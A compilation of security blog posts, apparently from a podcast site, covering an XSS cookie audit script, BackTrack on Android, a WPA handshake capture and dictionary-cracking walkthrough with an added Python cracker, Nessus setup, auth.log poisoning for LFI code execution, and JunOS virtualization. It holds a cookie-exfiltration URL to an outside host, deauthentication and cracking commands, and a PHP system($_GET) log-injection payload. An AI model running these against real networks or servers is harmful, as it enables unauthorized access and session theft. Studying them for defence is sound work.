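STOLEN_TO = "http://tools.lanmaster53.com/monster.php?cookie=PHPSESSID%3Dabc123"

if __name__ == "__main__":
    for header in SAMPLE_COOKIES:
        print(audit_set_cookie(header))
    print("image request allowed:", csp_allows_image(SAMPLE_CSP, STOLEN_TO, "https://app.example.com"))
```

HttpOnly is the control that directly defeats the snippet above, since document.cookie then never contains the session cookie. The img-src check is a second layer: it does not stop injected script from running, it only decides whether the Image() request can leave for an arbitrary host, so fixing the XSS itself still comes first.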


Review of Kingpin Book


Kingpin is the story of Max Vision from his teen years to when he was arrested and sentenced as the top carder in the underground: how he turned his hacking skills from good to bad, his constant attempts to do the right thing, and how he kept being pulled back into the world of a black hat. The book covers his youthful pranks and his forays into hacking, when he was one of the top white hats in the industry while that industry was young and booming during the dot-com era. Max made several bad decisions due to his temper and lack of control. In addition, the intellectual addiction that hacking produces, the rush of euphoria from being pitted against another, the challenge of bypassing defenses and being a shadow, undetected and powerful inside a system, caused him to delve deeper on the wrong side of the law, not to mention the amount of money he was making and his belief that in some part he was doing good and only harming the big companies. He used that energy and passion to become the master of one of the most powerful carder forums out there.

The book also covers the early history of the security industry and its players, the small band of programmers and technologists that started many of the security companies that changed the landscape, Max being one of the contributors to the beginnings of projects like Snort, the open source IDS, and to the sharing of knowledge that formed the beginnings of the industry. The book also covers the side of the law enforcement agencies and officers that participated in the cat-and-mouse game against the different crime organizations. It shows how law enforcement had to adapt to the ever-changing landscape of the Internet and how it changed the rules of the game.

We also see how the paths of many of the prominent figures involved in attacks intermingled in the small community of the carder underground, where many of those who were committing the crimes also, at one time or another, worked with law enforcement as informants and helped in operations, voluntarily or under threat of jail. My favorite part is on the hacking techniques used by these brilliant people, how they adapted and hid from law enforcement, and the mistakes that led to their discovery and arrest. One of the areas of interest is how some of the people involved successfully targeted law enforcement to gain information on the operations against them. I do believe that nobody could have brought this story to life in this way as Poulsen did, in great part due to his history as a hacker, knowing what motivates and drives the mentality of one, and his experiences as a man on the run from the law. His career as a journalist for Wired magazine provided the skills to convey all the technical concepts in the book in a way that is easy to grasp, taking the reader from scene to scene as played by each of the different players of the story, bringing each of those stories together and showing how they are all intertwined.

Below is a great write-up from Cory Kennedy.


I just finished a Backtrack 5 install on my Samsung Galaxy S phone.  I will detail the steps to get it running on most Android phones.  This method was ONLY tested on my Galaxy S (Vibrant), but it should work with other devices.

 


README.winning!


I have split this guide into two sections.  The first section, titled "Quick Version", is a simple set of steps to get this working on your phone; it uses files in which all the work described in the full version has already been done for you.

The "Full Version" goes into process detail if you would like to perform all the steps or it may help if you get stuck at any time during the process.  This guide will continually be updated to include any feedback or changes.

Quick Version:



  1. Download the complete set of files you need from here: http://l-lacker.com/bt5/BT5_ARM_Joined.zip Extract BT5.zip to your phones internal SDcard in a directory called "BT5" (cAsE sEnSiTiVe)

  2. Launch terminal emulator from your phone and type (everything after the $: or #: is user input):
    $: su
    #: cd sdcard
    #: cd BT5
    #: sh bootbt

  3. Once Backtrack is loaded (you will see a red root@localhost prompt), start the VNC server by typing startvnc at that prompt (stopvnc kills it).

  4. Launch a VNC client on your phone and point it at 127.0.0.1:5901. VNC password: toortoor (change it with vncpasswd; anything on the phone that can reach localhost can otherwise connect with the default).

  5. Welcome to Backtrack on your Phone!


Full Version


1. Download a copy of Backtrack 5 for ARM from : http://www.backtrack-linux.org/downloads/ (Be nice and register)

Name: BT5-GNOME-ARM.torrent
Size: 1060
Flavor: GNOME
Arch: arm
Image: IMG
Download: Torrent
MD5: a66bf35409f4458ee7f35a77891951eb

Update!!!

Complete package files that you need to install on your phone can be found here: http://l-lacker.com/bt5/BT5_ARM_Joined.zip Instructions are included.

2. Extract and review the "README" file.


I have posted the README here for quick reference and added my notes as I went through the process.  I urge you to read the official README included with the release before reading the annotated version below.  My notes are in bold.

I would HIGHLY recommend following busybox instructions for your specific rom.   Most of the time this means updating to the latest version, but that is not always the case.

The Vibrant comes with 16gig NON removable internal storage.  The phone mounts this as the "sdcard" and the external SD card is removable.  I will be using the internal mass storage device to install BT5.

Without wasting more time, onto the readme.

BackTrack 5 ARM Edition Quick Start
This image has been developed and tested on the Motorola Xoom.
Your mileage may vary on other devices. As this image runs in a chroot, you will need to have your device rooted. There are numerous tutorials on the subject online and are not included here.

***Rooting your device will potentially void its warranty and we are not in any way responsible if you brick your device while rooting it.***

### IMPORTANT POINTS ###
1. Since the image runs in a chroot, there is no root password set.

2. There are 2 scripts under /usr/bin/ 'startvnc' and 'stopvnc' that are set to start with the Xoom's default resolution.

Once Backtrack5 is running off your phones internal storage you will need to edit the scripts to match your phone or devices resolution.  In my case, the Vibrant uses 480x800.   Details on this step later in the instructions.


3. The current vnc password is set to 'toortoor' and can be changed by running 'vncpasswd'

4. This image is a work in progress and suggestions/tips from the community are always welcome.

### GETTING STARTED ###

ADB is a versatile tool for Android development and for interacting with the device, and while the steps below WILL work and are independent of your OS (assuming you have the Android SDK installed), I felt it was overkill for this task and simply mounted my SD card and moved the files over with the OS X Finder.  I also made changes from another machine using Windows Explorer.  Choose your comfort level; steps 1-5 are simply a means to an end, and that end is getting the files onto your SD card.


1. Once you have downloaded the ARM BT package, save the files in a convenient location. The steps below assume they are in the platform-tools folder of the Android SDK.

2. Go to your platform-tools directory and proceed to make a directory on the device to store BT5:
    ./adb shell
    mkdir /sdcard/BT5
    exit

3. Copy over the busybox install files:
    ./adb push busybox /sdcard/
    ./adb push installbusybox.sh /sdcard

4. Install busybox on the device:
    ./adb shell
    cd /sdcard/
    sh installbusybox.sh
    exit

5. Transfer the required BT5 files to the device:
    ./adb push fsrw /sdcard/BT5/
    ./adb push mountonly /sdcard/BT5/
    ./adb push bootbt /sdcard/BT5/
    ./adb push bt5.img.gz /sdcard/BT5/
    ./adb push unionfs /sdcard/BT5/

6. Uncompress the image and start BT5:
    ./adb shell
    su
    cd /sdcard/BT5
    gunzip bt5.img.gz
    sh bootbt

My internal SD card is formatted as FAT32, and this file system is "required" for the phone to interact with the contents of the card.  I have tried formatting the internal card with EXT3, EXT4 and exFAT and was greeted each time with a "Damaged SD card" message.
Because of this the installation stops when trying to extract the official bt5.img file from the ARM package, since it ends up being over 5 GB.  FAT32 cannot hold a single file larger than 4 GiB (minus one byte), so we should just give up. Right?




Nope, Lets Try Harder.


I tried splitting the bt5.img and reassembling it on the device, which failed as expected.  There is only one thing left to do....

Modify the bt5.img file to fit into 4 gigs.  What can we remove?


  1. Looks like someone over at XDA had the same idea, so I am going to revisit this section at a later date with instructions on how to manually create the image file.  I started the process, but decided that my end goal for this post was a working Backtrack 5 install on my Vibrant.

  2. Since the heavy lifting is done, It's time to grab the files (or contact me for a mirror) , join them together and place this file into the BT5 directory of our sdcard.
    To join the 3 files from the XDA post, put them all in the same directory and use cat to concatenate them (the shell expands the glob in name order, so the part names must sort correctly): "cat bt.7z.* > bt.7z"

  3. Extract the joined bt.7z file

  4. Rename bt.img to bt5.img and move that file to your SD card's BT5 directory.


This is what you should end up with in your phone's BT5 directory.
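As an added example (my code, not from Cory's post or the BackTrack team), here is the join, verify and size-check step in Python. The image you fetch from XDA or l-lacker.com is a third-party rebuild that will run as root on your phone, so get its checksum from whoever built it and verify before you copy it over; the MD5 published above is for the official torrent, not the re-cut image. The three-part "image" in the demo is constructed, and the checksum used is that of its content.

```python
"""Added example (not from Cory Kennedy's post): reassemble the split image the
way "cat bt.7z.* > bt.7z" does, check it against the MD5 published by whoever
built it, and refuse anything FAT32 cannot hold. The image here is a constructed
three-part stand-in, not the real BT5 image; paths and the checksum are demo values."""
import glob
import hashlib
import os
import tempfile

FAT32_MAX_FILE = 2 ** 32 - 1   # FAT32 keeps file sizes in 32 bits: 4 GiB minus one byte


def join_parts(base: str, out_path: str) -> list:
    """Concatenate <base>.* in lexical order, the order the shell glob hands to cat.
    Parts therefore need zero-padded suffixes (.001, .002, ...) or .10 sorts before .2."""
    parts = sorted(glob.glob(base + ".*"))
    if not parts:
        raise FileNotFoundError(f"no parts matching {base}.*")
    with open(out_path, "wb") as out:
        for part in parts:
            with open(part, "rb") as src:
                for chunk in iter(lambda: src.read(1 << 20), b""):
                    out.write(chunk)
    return parts


def md5_of(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def fits_fat32(path: str) -> bool:
    return os.path.getsize(path) <= FAT32_MAX_FILE


def prepare_image(base: str, out_path: str, expected_md5: str) -> dict:
    """Join, verify, size-check; delete the result on any failure so a bad or
    unverified image never gets copied to the card."""
    parts = join_parts(base, out_path)
    actual = md5_of(out_path)
    if actual != expected_md5.lower():
        os.remove(out_path)
        raise ValueError(f"checksum mismatch: expected {expected_md5}, got {actual}")
    size = os.path.getsize(out_path)
    if not fits_fat32(out_path):
        os.remove(out_path)
        raise ValueError(f"{size} bytes exceeds the FAT32 limit of {FAT32_MAX_FILE}")
    return {"parts": len(parts), "md5": actual, "size": size}


def demo(expected_md5: str = "b1946ac92492d2347c6235b4d2611184") -> dict:
    """Constructed parts whose joined content is b'hello\\n'; the default is its MD5."""
    d = tempfile.mkdtemp()
    for i, chunk in enumerate((b"hel", b"lo", b"\n"), start=1):
        with open(os.path.join(d, f"bt.7z.{i:03d}"), "wb") as f:
            f.write(chunk)
    return prepare_image(os.path.join(d, "bt.7z"), os.path.join(d, "bt5.img"), expected_md5)


if __name__ == "__main__":
    print(demo())
```

For the real image, call prepare_image with the directory holding bt.7z.001 and friends as the base, the destination under the card's BT5 directory, and the checksum the image's author published; a mismatch or an oversize result raises before anything lands on the card.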

Starting BackTrack 5

Once all the files have been transfered, test the installation by trying to start Backtrack from terminal emulator.

Success!

If all goes well, you'll be in the BT5 chroot:

    # sh bootbt
    net.ipv4.ip_forward = 1
    root@localhost:/#

    root@localhost:/# ls /pentest/
    backdoors  database     exploits   passwords  scanners  stressing  voip
    cisco      enumeration  forensics  python     sniffers  tunneling  web
    root@localhost:/#


3. ???? (or is this one profit?)


4. VNC


Here is the fun part, sure the shell is pretty to look at however I want a gui to interact with.

Note: Prior to starting the VNC server, you MUST perform this step to alter the screen resolution to match your device by modifying the /usr/bin/startvnc file.

If you do not alter the geometry you may encounter the error below.

I modified /usr/bin/startvnc by starting an SSH daemon on my phone and doing the work from a computer.

1. Start the VNC server running on the BT5 phone install.

2. Check the VNC log! BT5 is listening on 5901. Then click connect.

3. Welcome to Backtrack 5!

At the beginning of April  I tweeted: "Wouldn't this just bring tears to your eyes if it was true? #metasploitonandroid http://twitpic.com/4hfqgz " , and now its true. <tear>


Huge thanks to the backtrack team for providing an Android version of  Backtrack.  Great work!

Special thanks to : anantshri at XDA for the advice and doing the hard work of creating the image files so quickly.  Be sure to check out his other work.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Marcia Hofmann from the EFF drops by to get all legal on us in the event your devices are confiscated. Some good advice if you are traveling with devices that contain data that would rather not get seen. Then join us for drunken news of the week.

Drunken security news style:

Episode 243 Show Notes

Episode 243 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

Hacking the WPA Airwaves

|

It is interesting how many people believe that their wireless is secure because they are using WPA. Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table. The cool thing is I bought an ALFA usb antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless card in monitor mode; on most drivers airmon-ng creates a separate monitor interface, typically mon0, so use whatever interface name airmon-ng reports in the commands that follow)

kismet -c wlan0

•close the console window to see the packets being collected
•use Alt+K to reach the top pull-down menus; turn on the columns that show the access point type, BSSID, guessed IP range and channel number
•Ctrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c <channel> --bssid <AP BSSID> -w <capture prefix> wlan0

Example:

airodump-ng -c 9 --bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0   (Note: D-Link-01.cap is where the capture of all traffic will go)

Now open another window, as we need to force a reconnect from the target (see the Note below):

aireplay-ng -0 <deauth count> -a <AP BSSID> -c <client MAC> wlan0

Example:

aireplay-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

Once the client re-authenticates you will see "WPA handshake: <BSSID>" at the top of the airodump window; let it capture a little more traffic and exit, and everything will be in the D-Link-01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow tables). Keep in mind that WPA derives the PMK with PBKDF2 using the SSID as the salt, so a precomputed table only works for the SSID it was generated for (the Offensive Security tables cover a list of common SSIDs); for any other SSID you can build your own with genpmk, which ships with coWPAtty:

cowpatty -r <capture file> -d <hash file> -s <SSID>

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r <capture file> -f <word list> -s <SSID>

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite
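As an added example (my own code, not part of Mark's post or of coWPAtty), here is the offline attack that cowpatty performs on the capture, written out in Python: PMK from PBKDF2 over passphrase and SSID, PTK from the PMK and the nonces and MACs in the handshake, then the EAPOL MIC from message 2 as the check. It also shows why a table built for "dynamite" is useless against an AP called "D-Link". The handshake is constructed in the block (nonces, abbreviated EAPOL frame, weak passphrase); only the SSID and the two MAC addresses are the ones from the examples above.

```python
"""Added example (not part of Mark Bennett's post): why a captured WPA/WPA2-PSK
handshake falls to an offline dictionary attack, and why a precomputed table is
tied to one SSID. Every input below is constructed for the demo (nonces, EAPOL
frame, passphrase); the MACs and SSID are the ones from the post's examples."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, which is what ties a rainbow table to one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i in 0..3."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK derivation; its first 16 bytes are the KCK that keys the EAPOL MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed:
    HMAC-SHA1 truncated to 128 bits for WPA2/CCMP, HMAC-MD5 for WPA1/TKIP."""
    algo = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_mic_zeroed, algo).digest()[:16]


def crack_handshake(hs: dict, wordlist, wpa2: bool = True):
    """The attack cowpatty/aircrack run: per candidate, PMK -> PTK -> KCK, then
    compare against the MIC carried in message 2. Returns the passphrase or None.
    PBKDF2 (4096 rounds) is the cost per guess, which is what a table precomputes."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"],
                           hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], wpa2), hs["mic"]):
            return word
    return None


# --- constructed "capture", standing in for D-Link-01.cap ---------------------
SSID = b"dynamite"                          # SSID from the cowpatty example
AP_MAC = bytes.fromhex("001b11ec3dd7")      # BSSID from the airodump example
STA_MAC = bytes.fromhex("002000385106")     # client from the aireplay example
ANONCE = hashlib.sha256(b"demo anonce").digest()
SNONCE = hashlib.sha256(b"demo snonce").digest()
# EAPOL-Key message 2 with the 16-byte MIC field zeroed (abbreviated, constructed)
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + SNONCE + b"\x00" * 16


def build_demo_capture(passphrase: bytes) -> dict:
    """Play AP and client: compute the MIC a real message 2 would carry."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "ap_mac": AP_MAC, "sta_mac": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": EAPOL_MSG2, "mic": eapol_mic(kck, EAPOL_MSG2)}


CAPTURE = build_demo_capture(b"password123")          # the network's real (weak) key
WORDLIST = [b"letmein", b"op3nth3p0dbayd00rs", b"dynamite", b"password123"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_handshake(CAPTURE, WORDLIST))
    print("PMK changes with SSID:",
          pmk_from_passphrase(b"password123", SSID)
          != pmk_from_passphrase(b"password123", b"D-Link"))
```

Against a real capture you would parse the BSSID, client MAC, both nonces and message 2 out of the .cap file instead of building them; the derivation and the comparison are the same, which is also why the only defense is a passphrase that is not in any list an attacker can afford to run PBKDF2 over.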

Note: if you are in an environment with a lot of cell phones like the iPhone (and they are using their wireless to connect to the network), we found these all go to sleep when their screen is turned off, and their wireless card wakes up when the screen is activated. So you don't need to send a de-auth; all you have to do is hang around long enough for someone to touch their iPhone or whatever cell phone, have it wake up its wireless and re-authenticate to the network. In other words, there is the weakest link! -- LOL!

Happy Cracking

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY--I'm Out

~Mark Bennett

The PaulDotCom crew will be conducting random(Storm?) searches tonight with the aid of the EFF's Marcia Hofmann, who will give us an overview on our digital rights concerning search and seizure while traveling to the various [Def/Derby/Shmoo]Cons with sensitive research and intellectual property. Be sure to catch Episode 243 tonight, with random bag searches and possible full body scans starting at our regular time of 7:30 PM.

You can follow along and watch the show live via the link below:

NOTE: The video will play the most recent show up until we are live!


For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 243 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

One of my favorite tools in my toolbox is the vulnerability scanner Nessus, in part because of its accuracy and because I'm part of one of the teams that works on adding new features to it during the day. So I was very happy to see it included as part of Backtrack. Ever since I started working professionally in security Nessus has been part of my toolkit, and once nessuscmd came out it became even more integral to my workflow because I could automate work for my customers. Before that I always had to follow some odd procedures to get Nessus installed on the early versions of Backtrack, and those procedures were always prone to breaking when I updated to the latest version. I would like to share how to activate your copy of Nessus in Backtrack and some of the caveats that apply depending on your setup.

The first step is to have Backtrack installed as a virtual machine on your pentest/audit rig or installed locally on the machine's hard drive. Do not try to activate from the bootable DVD or from a USB drive if you intend to use it on several physical machines, because the registration process ties the activation to that specific host. Moving the VM from one host to another, or the USB drive (depending on how you configured Backtrack), is more than likely to require re-activation of your copy of Nessus.

The first thing you need to do if you are using a Professional Feed is go to http://support.tenable.com, log in, go to Manage Activation Codes and get your Professional Feed activation code. If you will be using a Home Feed you have to go to http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code and register for a Home Feed; the activation code is sent to the email address you provided. Once you have the activation code you can activate it on your Backtrack machine, running as root:

root@bt:~# /opt/nessus/bin/nessus-fetch --register M4D0-EWWQ-1EZU-3KSN
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

And yes, the activation code in the example is a fake one for demonstration purposes only. Treat a real one like a password: it is tied to your feed subscription.

The next step is to add an admin user on this box so you can connect, create profiles and policies, and launch scans:

root@bt:~# /opt/nessus/sbin/nessus-adduser
Login : carlos
Login password : 
Login password (again) : 
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that carlos has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done : 
(the user can have an empty rules set)
Login             : carlos
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] 
User added

Once the user has been created we can launch the Nessusd Daemon:

root@bt:~# /etc/init.d/nessusd start
Starting Nessus : .

Do keep in mind that since this is the first time the daemon runs, it will take a while to load and compile all the plugins. You can run top on the system and use capital P to sort by CPU (and capital R to reverse the order if needed); while loading, nessusd will take close to 100% of your CPU, and when finished it will settle down. Once it does, connect with your web browser to https://localhost:8834/ (or the machine's IP instead of localhost if connecting remotely). The server presents a self-signed certificate, so expect a browser warning on first connect, and make sure NoScript is set to allow scripts from localhost or the machine's address, as the case may be.

Here is a wonderful post from Lanmaster53. You need to make this site one of your favorites.

Log poisoning has been used for years to upgrade local file inclusion vulnerabilities to remote command execution. In most cases, web server logs are used to execute such an attack. Most admins have become wise to the technique and do a decent job of preventing this. However, an equal amount of attention is not always paid to authentication logs.


I was recently attempting to exploit a LFI vulnerability on a pen test and was having no luck poisoning the web server logs. Previous scans of the target showed that an OpenSSH service was running. I took one last shot at the LFI vulnerability and below was the result. I was shocked to find that auth.log was world readable.





By default, OpenSSH makes an entry (consisting of the user name and other data) to auth.log for every authentication attempt made to the ssh daemon. Knowing this, I did some quick testing and found that I could inject php code into auth.log from the user name field of an ssh client by attempting to authenticate. The command took some time to get working right as bash requires finesse for processing special characters, but after some troubleshooting, I came up with the following:





One issue I encountered is that OpenSSH makes 3 entries containing the user name to auth.log for every authentication attempt. In the following example, only one authentication attempt was made, but, as you can see, it appears in the log 3 times.





The injected command will run 3 times unless PHP execution is terminated after the 1st command. I did this above with the exit; command. The unfortunate side effect is that you have one chance to get this right. Otherwise, you have to wait until the log rotates before you can make another attempt. Here is what the final product looked like with the addition of a pre-format tag for aesthetics.
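The defensive side of this, as an added example (my code, not part of Tim's post): the poisoning leaves a very recognisable trace in auth.log, because the "username" OpenSSH echoes into its three log lines is a block of PHP rather than a name. The detector below parses constructed sshd lines in the OpenSSH syslog format of the time (an assumption; adjust the patterns to your version), flags usernames that carry code, and groups them by payload so the 3x repetition described above shows up as a count. The fix on the host side is what made the attack possible in the first place: auth.log should not be readable by the web server's user (root:adm and mode 0640 is the usual default), and PHP's open_basedir should keep includes out of /var/log entirely.

```python
"""Added example (not part of LaNMaSteR53's post): detection logic for the
auth.log poisoning described above, run over constructed sshd lines that mimic
the three entries OpenSSH writes for one failed login with a PHP-laden username.
The line formats follow OpenSSH 5.x-era syslog output (assumed); no real log is used."""
import re
from collections import defaultdict

# The three messages logged for a single attempt with an unknown user name
SSHD_USER_PATTERNS = [
    re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*?) from (?P<src>\S+)$"),
    re.compile(r"sshd\[\d+\]: input_userauth_request: invalid user (?P<user>.*)$"),
    re.compile(r"sshd\[\d+\]: Failed password for invalid user (?P<user>.*?) "
               r"from (?P<src>\S+) port \d+ ssh2$"),
]
# Things a PHP include would execute if this log were pulled in through an LFI;
# the marker list is my assumption, extend it for your environment
INJECTED_CODE = re.compile(
    r"<\?|\?>|\$_(?:GET|POST|REQUEST|COOKIE)\b|"
    r"\b(?:system|exec|passthru|shell_exec|eval|base64_decode)\s*\(", re.I)


def extract_user_events(lines):
    """Pull (username, source IP) out of every sshd line that echoes a username."""
    events = []
    for line in lines:
        for pat in SSHD_USER_PATTERNS:
            m = pat.search(line)
            if m:
                events.append({"user": m.group("user"),
                               "src": m.groupdict().get("src"), "line": line})
                break
    return events


def find_poisoning(lines):
    """Events whose username carries code rather than a name."""
    return [e for e in extract_user_events(lines) if INJECTED_CODE.search(e["user"])]


def summarize(findings):
    """Group by payload: the per-payload count reproduces the 3x repetition the
    post describes, and the sources tell you where the ssh client came from."""
    out = defaultdict(lambda: {"count": 0, "sources": set()})
    for f in findings:
        out[f["user"]]["count"] += 1
        if f["src"]:
            out[f["user"]]["sources"].add(f["src"])
    return dict(out)


# Constructed sample: one poisoning attempt (three lines), one ordinary brute-force
# probe, one legitimate login
SAMPLE_AUTH_LOG = """\
May 10 12:34:56 web01 sshd[2231]: Invalid user <?php system($_GET['c']); exit; ?> from 10.0.0.5
May 10 12:34:56 web01 sshd[2231]: input_userauth_request: invalid user <?php system($_GET['c']); exit; ?>
May 10 12:34:58 web01 sshd[2231]: Failed password for invalid user <?php system($_GET['c']); exit; ?> from 10.0.0.5 port 51234 ssh2
May 10 12:35:10 web01 sshd[2240]: Invalid user oracle from 10.0.0.9
May 10 12:35:12 web01 sshd[2240]: Failed password for invalid user oracle from 10.0.0.9 port 41002 ssh2
May 10 12:36:01 web01 sshd[2251]: Accepted publickey for deploy from 10.0.0.2 port 40112 ssh2
""".splitlines()

if __name__ == "__main__":
    for payload, info in summarize(find_poisoning(SAMPLE_AUTH_LOG)).items():
        print(f"{info['count']}x from {sorted(info['sources'])}: {payload!r}")
```

Feed it a real auth.log with `find_poisoning(open("/var/log/auth.log").readlines())` and alert on any hit; a plain brute-force run like the "oracle" probe above is deliberately not flagged, since the signal here is code in the username, not failed logins.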


As originally posted here.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Virtualizing JunOS on VMware

|

Many times when working with a client network, or on our own, we need to test, document and validate certain network configurations in a test environment. Sadly not many have the budget for one, so different scenarios cannot be tried to gauge the impact the changes might have on the production network. For the majority of configuration work, system settings and routing, a virtualized environment can be a great help; anything ASIC- or hardware-specific, sadly, cannot be reproduced this way. In this blog post I will cover how to virtualize the JunOS operating system to aid with testing and validation. I did this for a friend who needed to migrate the configuration of several of his Juniper routers to a newer version of the OS and hardware, and who also asked me for recommendations on hardening the routers. I do have to say I really like JunOS, especially since it is a full FreeBSD system underneath to which the user has access.

Requirements

Software required to install JunOS on VMware:

  • Download FreeBSD 4.11 mini ISO from FreeBSD ftp site Link
  • M Series Router jinstall Domestic Signed tgz file, Export version does not provide SSH.
  • Jweb tgz file for the version of JunOS being install

NOTE: Do not ask for Juniper images I will ignore those messages. You need a valid contract to obtain them.

Settings for Workstation 7.x


  • On VMware Workstation:
  • Create a New Virtual Machine.
  • Select on the image the FreeBSD ISO image.
  • Ensure that FreeBSD is selected as the operating system type.
  • Make sure the HDD is of type IDE and 4GB or larger for versions 9.x and 10.x; for version 11.x use 6GB or larger.
  • For memory set initially 512MB for 9.x and after installation of jweb it can be changed to 256MB, for 10.x and 11.x set initial value to 1024MB and after install 512MB.
  • After creating the VM and before installing, open the VMX file and make sure the SCSI device presence setting is FALSE: scsi0.present = "FALSE"

Settings for VMWare ESX 4.x


On VMWare ESX and ESXi :

  • Create a New Virtual Machine with Operating System Other -> FreeBSD 32-bits
  • Make sure the HDD is of type IDE and 4GB or larger for versions 9.x and 10.x; for version 11.x use 6GB or larger.
  • "Select the Edit Virtual Machine Settings Before Completion" Check Box.
  • Change the SCSI Controller to LSI Logic SAS
  • For memory set initially 512MB for 9.x and after installation of jweb it can be changed to 256MB, for 10.x and 11.x set initial value to 1024MB and after install 512MB.
  • Set in the CD Rom the FreeBSD 4.11 ISO and make sure that it is Connected before saving.

FreeBSD Installation


  • Skip the kernel configuration and choose the standard installation.
  • When prompted to use fdisk select OK.
  • When you get to partitioning, allocate first the whole disk to BSD.
  • Press c then OK for the other prompts and finish by selecting q.
  • Select BootMgr as the boot manager.
  • Create the disk slices as shown in the table below:
    Slice     Mount      Size
    ad0s1a    /          2000M
    ad0s1b    swap       1024M
    ad0s1e    /config    64M
    ad0s1f    /var       remaining space
  • / has to be a reasonable size or else you'll run out of space on /mnt.
  • Choose 'Minimal' installation type and skip installing ports.
  • After the base is installed it will ask whether you want to configure Ethernet settings; select yes and use DHCP to configure your NIC (em0). Write down the IP given by DHCP and set a hostname for the server. This allows us to scp the jinstall file after the reboot.
  • Except for DHCP on interface em0, choose "no" for everything else (IPv6, Linux compatibility, NFS, FTP, inetd, time zone, etc.).
  • When asked to create a user create one called junos, set a password for it and add it to the group wheel. Ensure to put a password for the root account.
  • After the installer completes it will reboot. Make sure that you have disconnected the CD so as to make sure the VM will not boot in to the CD again.
  • scp to /var/tmp on the VM the jinstall file only, do not copy the jweb file yet since during installation the file system will be formatted and changed.
 $ scp jinstall-<version>-domestic-signed.tgz junos@<ip>:/var/tmp
  • Once the file is there, SSH in to the server and use the su command to gain root privileges:
    $ su -

    JunOS 9.6R1


    Unpack the different parts of the installer and remove hash files used to validate the installer:

    # cd /var/tmp/
    
    # mkdir jinst
    
    # cd jinst
    
    # tar xvzf ../jinstall-9.6R1.13-domestic-signed.tgz
    
    # rm *.md5 *.sha1 *.sig
    
    # mkdir domestic
    
    # cd domestic/
    
    # tar xvzf ../jinstall-9.6R1.13-domestic.tgz
    
    # mkdir pkgtools
    
    # cd pkgtools
    
    # ls
    
    # tar xvzf ../pkgtools.tgz

     

    Make the hardware check always return true by replacing the checkpic command with /usr/bin/true:

    # cp /usr/bin/true bin/checkpic

    Repackage the installer:

    # tar cvzf ../pkgtools.tgz *
    
    # cd ..
    
    # rm -rf pkgtools
    
    # tar cvzf ../jinstall-9.6R1.13-domestic.tgz *
    
    # cd ..
    
    # rm -rf domestic/
    
    # cd jinst
    
    # tar cvzf ../jinstall-9.6R1.13-domestic-signed.tgz *
    
    # cd ..
    
    # rm -rf jinst/

    Install the package using pkg_add:

    # pkg_add jinstall-9.6R1.13-domestic-signed.tgz
    
    Adding jinstall...
    
    sysctl: unknown oid 'hw.product.model'
    
